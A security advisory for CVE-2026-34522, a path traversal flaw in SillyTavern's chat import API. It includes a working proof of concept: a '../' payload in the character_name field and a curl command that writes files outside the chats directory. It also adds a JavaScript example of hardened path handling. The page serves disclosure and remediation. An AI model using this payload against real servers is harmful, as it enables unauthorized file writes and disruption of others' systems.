CVE-2026-34522

HIGH
2026-04-01 https://github.com/SillyTavern/SillyTavern GHSA-xvww-xhx6-22pf
8.1
CVSS 3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Confidentiality: None
- Integrity: High
- Availability: High

Lifecycle Timeline

3 events:

- Patch Released: Apr 02, 2026 - 02:30 (nvd). Patch available
- Analysis Generated: Apr 01, 2026 - 22:16 (vuln.today)
- CVE Published: Apr 01, 2026 - 21:36 (nvd). HIGH 8.1

Description

### Summary

A path traversal vulnerability in `/api/chats/import` allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into `character_name`.

### Details

`character_name` is used unsafely as part of the destination filename and then passed into `path.join(...)` without sanitization.

Evidence:

- Import handler entrypoint: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L680-L686>
- Unsanitized `character_name` used in output filename: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L719-L723>
- Same write pattern in JSONL import branch: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L759-L766>
- Endpoint auth context (authenticated user access): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239>

Example payload:

- `character_name=../../../../tmp/st_poc`

This causes the final destination path to escape from `<user>/chats/<avatar>/...` and write to an attacker-controlled location such as `/tmp/...` (or any writable path for the service account).

### PoC

Prerequisites:

- Valid authenticated session cookie (`cookie.txt`)
- Valid CSRF token (`$TOKEN`)

Prepare payload:

```bash
printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl
```

Trigger arbitrary write:

```bash
curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
  -F "avatar=@/tmp/poc.jsonl" \
  -F "file_type=jsonl" \
  -F "avatar_url=a.png" \
  -F "character_name=../../../../tmp/st_poc" \
  -F "user_name=u" \
  http://TARGET:8000/api/chats/import
```

Observed result:

- A file is created outside chats directory, for example: `/tmp/st_poc - <timestamp> imported.jsonl`

### Impact

- Integrity: attacker can create files in unintended filesystem locations.
- Availability: can be used for disk abuse and disruptive file placement.
- Can become more severe when chained with other local processing behaviors.

### Resolution

The issue was addressed in version 1.17.0.
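
The `path.join(...)` pattern from the Details section beside a hardened form, as an added example that is not SillyTavern's code or its 1.17.0 fix. `CHATS_ROOT`, the function names, the avatar directory `a` and the timestamp value are assumptions made for illustration.

```javascript
const path = require('node:path');

// Constructed root standing in for <user>/chats (assumption, not the project's path).
const CHATS_ROOT = '/data/u/chats';

// Pattern the advisory describes: the request field is interpolated into the
// filename and handed to path.join(), which normalizes the "../" segments.
function unsafeDestination(avatar, characterName, stamp) {
  return path.posix.join(CHATS_ROOT, avatar, `${characterName} - ${stamp} imported.jsonl`);
}

// Reduce an untrusted field to one path component: no separators, no control
// characters, and never "." or ".." on its own.
function toFileComponent(value) {
  const cleaned = String(value)
    .replace(/[\x00-\x1f\x7f]/g, '')
    .replace(/[\\/:*?"<>|]/g, '_')
    .trim();
  if (cleaned === '' || /^\.+$/.test(cleaned)) {
    throw new Error('invalid name');
  }
  return cleaned;
}

// Lexical containment check. It does not follow symlinks; resolve both sides
// with fs.realpath first when the directory tree may contain them.
function isInside(base, candidate) {
  const root = path.posix.resolve(base) + path.posix.sep;
  return path.posix.resolve(candidate).startsWith(root);
}

// Hardened form: sanitize every component, then verify the resolved result
// is still under the chats root before anything is written.
function safeDestination(avatar, characterName, stamp) {
  const file = `${toFileComponent(characterName)} - ${stamp} imported.jsonl`;
  const dest = path.posix.resolve(CHATS_ROOT, toFileComponent(avatar), file);
  if (!isInside(CHATS_ROOT, dest)) {
    throw new Error('destination escapes chats directory');
  }
  return dest;
}
```

The same `isInside` check can be run over import request logs or existing chat filenames to flag `character_name` values that would have resolved outside the root.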

Analysis

Authenticated path traversal in SillyTavern's chat import API enables authenticated users to write arbitrary files outside intended directories. Attackers exploit unsanitized 'character_name' parameters in /api/chats/import (versions prior to 1.17.0) to inject traversal sequences (e.g., '../../../../tmp/malicious'), causing file writes to arbitrary filesystem locations accessible to the service account. …


Priority Score

41
KEV: 0
EPSS: +0.1
CVSS: +40
POC: 0
